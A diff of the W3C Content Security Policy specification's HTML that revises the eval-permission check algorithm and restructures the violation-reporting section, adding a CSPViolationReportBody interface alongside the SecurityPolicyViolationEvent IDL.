     <p>Given two <a data-link-type="dfn" href="https://tc39.github.io/ecma262#realm" id="ref-for-realm">realms</a> (<var>callerRealm</var> and <var>calleeRealm</var>), and a string (<var>source</var>), this algorithm
   returns normally if string compilation is allowed, and throws an "<code>EvalError</code>" if not:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>globals</var> be a list containing <var>callerRealm</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-realm-global" id="ref-for-concept-realm-global">global object</a> and <var>calleeRealm</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-realm-global" id="ref-for-concept-realm-global①">global object</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>global</var> in <var>globals</var>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>result</var> be "<code>Allowed</code>".</p>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>policy</var> in <var>global</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list②①">CSP list</a>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Let <var>source-list</var> be <code>null</code>.</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>policy</var> contains a <a data-link-type="dfn" href="#directives" id="ref-for-directives⑧">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name⑥">name</a> is "<code>script-src</code>", then
   set <var>source-list</var> to that <a data-link-type="dfn" href="#directives" id="ref-for-directives⑨">directive</a>'s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑤">value</a>.</p>
           <p>Otherwise if <var>policy</var> contains a <a data-link-type="dfn" href="#directives" id="ref-for-directives①⓪">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name⑦">name</a> is
   "<code>default-src</code>", then set <var>source-list</var> to that directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑥">value</a>.</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>source-list</var> is not <code>null</code>, and does not contain a <a data-link-type="dfn" href="#source-expression" id="ref-for-source-expression②">source expression</a> which is
   an <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#ascii-case-insensitive" id="ref-for-ascii-case-insensitive①">ASCII case-insensitive</a> match for the string "<a data-link-type="grammar" href="#grammardef-unsafe-eval" id="ref-for-grammardef-unsafe-eval"><code>'unsafe-eval'</code></a>",
   then:</p>
           <ol>
-           <li data-md>
+           <li data-md="">
             <p>Let <var>violation</var> be the result of executing <a href="#create-violation-for-global">§2.4.1 Create a violation object for global, policy, and directive</a> on <var>global</var>, <var>policy</var>, and "<code>script-src</code>".</p>
-           <li data-md>
+           <li data-md="">
             <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource⑦">resource</a> to "<code>inline</code>".</p>
-           <li data-md>
+           <li data-md="">
             <p>If <var>source-list</var> <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list-contain" id="ref-for-list-contain②">contains</a> the expression
   "<a data-link-type="grammar" href="#grammardef-report-sample" id="ref-for-grammardef-report-sample②"><code>'report-sample'</code></a>", then set <var>violation</var>’s <a data-link-type="dfn" href="#violation-sample" id="ref-for-violation-sample③">sample</a> to
   the substring of <var>source</var> containing its first 40 characters.</p>
-           <li data-md>
+           <li data-md="">
             <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on <var>violation</var>.</p>
-           <li data-md>
+           <li data-md="">
             <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①⑥">disposition</a> is "<code>enforce</code>", then set <var>result</var> to
   "<code>Blocked</code>".</p>
           </ol>
         </ol>
-       <li data-md>
+       <li data-md="">
         <p>If <var>result</var> is "<code>Blocked</code>", throw an <code>EvalError</code> exception.</p>
       </ol>
     </ol>
-    <p class="issue" id="issue-d5a07bef"><a class="self-link" href="#issue-d5a07bef"></a> <code class="idl"><a data-link-type="idl" href="https://tc39.github.io/ecma262#sec-hostensurecancompilestrings" id="ref-for-sec-hostensurecancompilestrings①">HostEnsureCanCompileStrings()</a></code> does not include the string which is
+    <p class="issue" id="issue-910d1dca"><a class="self-link" href="#issue-910d1dca"></a> <code class="idl"><a data-link-type="idl" href="https://tc39.github.io/ecma262#sec-hostensurecancompilestrings" id="ref-for-sec-hostensurecancompilestrings①">HostEnsureCanCompileStrings()</a></code> does not include the string which is
   going to be compiled as a parameter. We’ll also need to update HTML to pipe that value through
   to CSP. <a href="https://github.com/tc39/ecma262/issues/938">&lt;https://github.com/tc39/ecma262/issues/938></a></p>
    </section>
    <section>
     <h2 class="heading settled" data-level="5" id="reporting"><span class="secno">5. </span><span class="content"> Reporting </span><a class="self-link" href="#reporting"></a></h2>
-    <p>When one or more of a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②⑨">policy</a>’s directives is violated, a <dfn class="dfn-paneled" data-dfn-type="dfn" data-export data-lt="violation report" id="violation-report">violation
-  report</dfn> may be generated and sent out to a reporting endpoint associated
-  with the <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③⓪">policy</a>.</p>
-    <h3 class="heading settled" data-level="5.1" id="violation-events"><span class="secno">5.1. </span><span class="content"> Violation DOM Events </span><a class="self-link" href="#violation-events"></a></h3>
-<pre class="idl highlight def"><c- b>enum</c-> <dfn class="dfn-paneled idl-code" data-dfn-type="enum" data-export id="enumdef-securitypolicyviolationeventdisposition"><code><c- g>SecurityPolicyViolationEventDisposition</c-></code></dfn> {
-  <dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEventDisposition" data-dfn-type="enum-value" data-export id="dom-securitypolicyviolationeventdisposition-enforce"><code><c- s>"enforce"</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventdisposition-enforce"></a></dfn>, <dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEventDisposition" data-dfn-type="enum-value" data-export id="dom-securitypolicyviolationeventdisposition-report"><code><c- s>"report"</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventdisposition-report"></a></dfn>
-};
-
-[<dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="constructor" data-export data-lt="SecurityPolicyViolationEvent(type, eventInitDict)|SecurityPolicyViolationEvent(type)" id="dom-securitypolicyviolationevent-securitypolicyviolationevent"><code><c- g>Constructor</c-></code><a class="self-link" href="#dom-securitypolicyviolationevent-securitypolicyviolationevent"></a></dfn>(<a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString"><c- b>DOMString</c-></a> <dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEvent/SecurityPolicyViolationEvent(type, eventInitDict)" data-dfn-type="argument" data-export id="dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-type"><code><c- g>type</c-></code><a class="self-link" href="#dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-type"></a></dfn>, <c- b>optional</c-> <a class="n" data-link-type="idl-name" href="#dictdef-securitypolicyviolationeventinit" id="ref-for-dictdef-securitypolicyviolationeventinit"><c- n>SecurityPolicyViolationEventInit</c-></a> <dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEvent/SecurityPolicyViolationEvent(type, eventInitDict)" data-dfn-type="argument" data-export id="dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-eventinitdict"><code><c- g>eventInitDict</c-></code><a class="self-link" href="#dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-eventinitdict"></a></dfn>),
- <a class="idl-code" data-link-type="extended-attribute" href="https://heycam.github.io/webidl/#Exposed" id="ref-for-Exposed"><c- g>Exposed</c-></a>=(<c- n>Window</c->,<c- n>Worker</c->)]
-<c- b>interface</c-> <dfn class="dfn-paneled idl-code" data-dfn-type="interface" data-export id="securitypolicyviolationevent"><code><c- g>SecurityPolicyViolationEvent</c-></code></dfn> : <a class="n" data-link-type="idl-name" href="https://dom.spec.whatwg.org/#event" id="ref-for-event"><c- n>Event</c-></a> {
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString"><c- b>USVString</c-></a>      <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="USVString" id="dom-securitypolicyviolationevent-documenturl"><code><c- g>documentURL</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①"><c- b>USVString</c-></a>      <a class="idl-code" data-link-type="attribute" data-readonly data-type="USVString" href="#dom-securitypolicyviolationevent-documenturi" id="ref-for-dom-securitypolicyviolationevent-documenturi"><c- g>documentURI</c-></a>; // historical alias of documentURL
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString②"><c- b>USVString</c-></a>      <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="USVString" id="dom-securitypolicyviolationevent-referrer"><code><c- g>referrer</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString③"><c- b>USVString</c-></a>      <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="USVString" id="dom-securitypolicyviolationevent-blockedurl"><code><c- g>blockedURL</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString④"><c- b>USVString</c-></a>      <a class="idl-code" data-link-type="attribute" data-readonly data-type="USVString" href="#dom-securitypolicyviolationevent-blockeduri" id="ref-for-dom-securitypolicyviolationevent-blockeduri"><c- g>blockedURI</c-></a>; // historical alias of blockedURL
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString①"><c- b>DOMString</c-></a>      <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="DOMString" id="dom-securitypolicyviolationevent-effectivedirective"><code><c- g>effectiveDirective</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString②"><c- b>DOMString</c-></a>      <a class="idl-code" data-link-type="attribute" data-readonly data-type="DOMString" href="#dom-securitypolicyviolationevent-violateddirective" id="ref-for-dom-securitypolicyviolationevent-violateddirective"><c- g>violatedDirective</c-></a>; // historical alias of effectiveDirective
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString③"><c- b>DOMString</c-></a>      <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="DOMString" id="dom-securitypolicyviolationevent-originalpolicy"><code><c- g>originalPolicy</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑤"><c- b>USVString</c-></a>      <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="USVString" id="dom-securitypolicyviolationevent-sourcefile"><code><c- g>sourceFile</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString④"><c- b>DOMString</c-></a>      <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="DOMString" id="dom-securitypolicyviolationevent-sample"><code><c- g>sample</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition"><c- n>SecurityPolicyViolationEventDisposition</c-></a>      <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="SecurityPolicyViolationEventDisposition" id="dom-securitypolicyviolationevent-disposition"><code><c- g>disposition</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short"><c- b>unsigned</c-> <c- b>short</c-></a> <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="unsigned short" id="dom-securitypolicyviolationevent-statuscode"><code><c- g>statusCode</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long"><c- b>unsigned</c-> <c- b>long</c-></a>  <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="unsigned long" id="dom-securitypolicyviolationevent-lineno"><code><c- g>lineno</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long①"><c- b>unsigned</c-> <c- b>long</c-></a>  <a class="idl-code" data-link-type="attribute" data-readonly data-type="unsigned long" href="#dom-securitypolicyviolationevent-linenumber" id="ref-for-dom-securitypolicyviolationevent-linenumber"><c- g>lineNumber</c-></a>; // historical alias of lineno
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long②"><c- b>unsigned</c-> <c- b>long</c-></a>  <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export data-readonly data-type="unsigned long" id="dom-securitypolicyviolationevent-colno"><code><c- g>colno</c-></code></dfn>;
-    <c- b>readonly</c->    <c- b>attribute</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long③"><c- b>unsigned</c-> <c- b>long</c-></a>  <a class="idl-code" data-link-type="attribute" data-readonly data-type="unsigned long" href="#dom-securitypolicyviolationevent-columnnumber" id="ref-for-dom-securitypolicyviolationevent-columnnumber"><c- g>columnNumber</c-></a>; // historical alias of colno
-};
-
-<c- b>dictionary</c-> <dfn class="dfn-paneled idl-code" data-dfn-type="dictionary" data-export id="dictdef-securitypolicyviolationeventinit"><code><c- g>SecurityPolicyViolationEventInit</c-></code></dfn> : <a class="n" data-link-type="idl-name" href="https://dom.spec.whatwg.org/#dictdef-eventinit" id="ref-for-dictdef-eventinit"><c- n>EventInit</c-></a> {
-    <c- b>required</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑥"><c- b>USVString</c-></a>      <dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="USVString      " id="dom-securitypolicyviolationeventinit-documenturl"><code><c- g>documentURL</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-documenturl"></a></dfn>;
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑦"><c- b>USVString</c-></a>      <dfn class="idl-code" data-default="&quot;&quot;" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="USVString      " id="dom-securitypolicyviolationeventinit-referrer"><code><c- g>referrer</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-referrer"></a></dfn> = "";
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑧"><c- b>USVString</c-></a>      <dfn class="idl-code" data-default="&quot;&quot;" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="USVString      " id="dom-securitypolicyviolationeventinit-blockedurl"><code><c- g>blockedURL</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-blockedurl"></a></dfn> = "";
-    <c- b>required</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑤"><c- b>DOMString</c-></a>      <dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="DOMString      " id="dom-securitypolicyviolationeventinit-effectivedirective"><code><c- g>effectiveDirective</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-effectivedirective"></a></dfn>;
-    <c- b>required</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑥"><c- b>DOMString</c-></a>      <dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="DOMString      " id="dom-securitypolicyviolationeventinit-originalpolicy"><code><c- g>originalPolicy</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-originalpolicy"></a></dfn>;
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString⑨"><c- b>USVString</c-></a>      <dfn class="idl-code" data-default="&quot;&quot;" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="USVString      " id="dom-securitypolicyviolationeventinit-sourcefile"><code><c- g>sourceFile</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-sourcefile"></a></dfn> = "";
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString⑦"><c- b>DOMString</c-></a>      <dfn class="idl-code" data-default="&quot;&quot;" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="DOMString      " id="dom-securitypolicyviolationeventinit-sample"><code><c- g>sample</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-sample"></a></dfn> = "";
-    <c- b>required</c-> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition①"><c- n>SecurityPolicyViolationEventDisposition</c-></a> <dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="SecurityPolicyViolationEventDisposition " id="dom-securitypolicyviolationeventinit-disposition"><code><c- g>disposition</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-disposition"></a></dfn>;
-    <c- b>required</c-> <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short①"><c- b>unsigned</c-> <c- b>short</c-></a> <dfn class="idl-code" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="unsigned short " id="dom-securitypolicyviolationeventinit-statuscode"><code><c- g>statusCode</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-statuscode"></a></dfn>;
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long④"><c- b>unsigned</c-> <c- b>long</c-></a>  <dfn class="idl-code" data-default="0" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="unsigned long  " id="dom-securitypolicyviolationeventinit-lineno"><code><c- g>lineno</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-lineno"></a></dfn> = 0;
-             <a class="idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long⑤"><c- b>unsigned</c-> <c- b>long</c-></a>  <dfn class="idl-code" data-default="0" data-dfn-for="SecurityPolicyViolationEventInit" data-dfn-type="dict-member" data-export data-type="unsigned long  " id="dom-securitypolicyviolationeventinit-colno"><code><c- g>colno</c-></code><a class="self-link" href="#dom-securitypolicyviolationeventinit-colno"></a></dfn> = 0;
+    <p>When one or more of a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②⑨">policy</a>’s directives is violated,
+  a <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="csp-violation-report">csp violation report</dfn> may be generated and sent out to a
+  reporting endpoint associated with the <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③⓪">policy</a>.</p>
+    <p><a data-link-type="dfn" href="#csp-violation-report" id="ref-for-csp-violation-report">csp violation report</a> have the <a data-link-type="dfn" href="https://w3c.github.io/reporting/#report-type" id="ref-for-report-type">report type</a> "feature-policy-violation".</p>
+    <p><a data-link-type="dfn" href="#csp-violation-report" id="ref-for-csp-violation-report①">csp violation report</a> are <a data-link-type="dfn" href="https://w3c.github.io/reporting/#visible-to-reportingobservers" id="ref-for-visible-to-reportingobservers">visible to <code>ReportingObserver</code>s</a>. </p>
+<pre class="idl highlight def"><span class="kt">interface</span> <dfn class="nv dfn-paneled idl-code" data-dfn-type="interface" data-export="" id="cspviolationreportbody"><code>CSPViolationReportBody</code></dfn> : <a class="n" data-link-type="idl-name" href="https://w3c.github.io/reporting/#reportbody" id="ref-for-reportbody">ReportBody</a> {
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString"><span class="kt">USVString</span></a> <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString" id="dom-cspviolationreportbody-documenturl"><code>documentURL</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString①"><span class="kt">USVString</span></a>? <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString?" id="dom-cspviolationreportbody-referrer"><code>referrer</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString②"><span class="kt">USVString</span></a>? <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString?" id="dom-cspviolationreportbody-blockedurl"><code>blockedURL</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString"><span class="kt">DOMString</span></a> <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="DOMString" id="dom-cspviolationreportbody-effectivedirective"><code>effectiveDirective</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString①"><span class="kt">DOMString</span></a> <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="DOMString" id="dom-cspviolationreportbody-originalpolicy"><code>originalPolicy</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-USVString" id="ref-for-idl-USVString③"><span class="kt">USVString</span></a>? <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="USVString?" id="dom-cspviolationreportbody-sourcefile"><code>sourceFile</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString②"><span class="kt">DOMString</span></a>? <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="DOMString?" id="dom-cspviolationreportbody-sample"><code>sample</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n" data-link-type="idl-name" href="#enumdef-securitypolicyviolationeventdisposition" id="ref-for-enumdef-securitypolicyviolationeventdisposition">SecurityPolicyViolationEventDisposition</a> <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="SecurityPolicyViolationEventDisposition" id="dom-cspviolationreportbody-disposition"><code>disposition</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-short" id="ref-for-idl-unsigned-short"><span class="kt">unsigned</span> <span class="kt">short</span></a> <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="unsigned short" id="dom-cspviolationreportbody-statuscode"><code>statusCode</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long"><span class="kt">unsigned</span> <span class="kt">long</span></a>? <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="unsigned long?" id="dom-cspviolationreportbody-linenumber"><code>lineNumber</code></dfn>;
+  <span class="kt">readonly</span> <span class="kt">attribute</span> <a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-unsigned-long" id="ref-for-idl-unsigned-long①"><span class="kt">unsigned</span> <span class="kt">long</span></a>? <dfn class="nv dfn-paneled idl-code" data-dfn-for="CSPViolationReportBody" data-dfn-type="attribute" data-export="" data-readonly="" data-type="unsigned long?" id="dom-cspviolationreportbody-columnnumber"><code>columnNumber</code></dfn>;
 };
 </pre>
-    <p>The <dfn class="dfn-paneled idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="attribute" data-export id="dom-securitypolicyviolationevent-documenturi"><code>documentURI</code></dfn> attribute’s
+    <h3 class="heading settled" data-level="5.1" id="violation-events"><span class="secno">5.1. </span><span class="content"> Violation DOM Events </span><a class="self-link" href="#violation-events"></a></h3>
+<pre class="idl highlight def"><span class="kt">enum</span> <dfn class="nv dfn-paneled idl-code" data-dfn-type="enum" data-export="" id="enumdef-securitypolicyviolationeventdisposition"><code>SecurityPolicyViolationEventDisposition</code></dfn> {
+  <dfn class="s idl-code" data-dfn-for="SecurityPolicyViolationEventDisposition" data-dfn-type="enum-value" data-export="" data-lt="&quot;enforce&quot;|enforce" id="dom-securitypolicyviolationeventdisposition-enforce"><code>"enforce"</code><a class="self-link" href="#dom-securitypolicyviolationeventdisposition-enforce"></a></dfn>, <dfn class="s idl-code" data-dfn-for="SecurityPolicyViolationEventDisposition" data-dfn-type="enum-value" data-export="" data-lt="&quot;report&quot;|report" id="dom-securitypolicyviolationeventdisposition-report"><code>"report"</code><a class="self-link" href="#dom-securitypolicyviolationeventdisposition-report"></a></dfn>
+};
+
+[<dfn class="nv idl-code" data-dfn-for="SecurityPolicyViolationEvent" data-dfn-type="constructor" data-export="" data-lt="SecurityPolicyViolationEvent(type, eventInitDict)|SecurityPolicyViolationEvent(type)" id="dom-securitypolicyviolationevent-securitypolicyviolationevent"><code>Constructor</code><a class="self-link" href="#dom-securitypolicyviolationevent-securitypolicyviolationevent"></a></dfn>(<a class="n idl-code" data-link-type="interface" href="https://heycam.github.io/webidl/#idl-DOMString" id="ref-for-idl-DOMString③"><span class="kt">DOMString</span></a> <dfn class="nv idl-code" data-dfn-for="SecurityPolicyViolationEvent/SecurityPolicyViolationEvent(type, eventInitDict)" data-dfn-type="argument" data-export="" id="dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-type"><code>type</code><a class="self-link" href="#dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-type"></a></dfn>, <span class="kt">optional</span> <a class="n" data-link-type="idl-name" href="#dictdef-securitypolicyviolationeventinit" id="ref-for-dictdef-securitypolicyviolationeventinit">SecurityPolicyViolationEventInit</a> <dfn class="nv idl-code" data-dfn-for="SecurityPolicyViolationEvent/SecurityPolicyViolationEvent(type, eventInitDict)" data-dfn-type="argument" data-export="" id="dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-eventinitdict"><code>eventInitDict</code><a class="self-link" href="#dom-securitypolicyviolationevent-securitypolicyviolationevent-type-eventinitdict-eventinitdict"></a></dfn>),
+ <a class="nv idl-code" data-link-type="extended-attribute" href="https://heycam.github.io/webidl/#Exposed" id="ref-for-Exposed">Exposed</a>=(<span class="n">Window</span>,<span class="n">Worker</span>)]
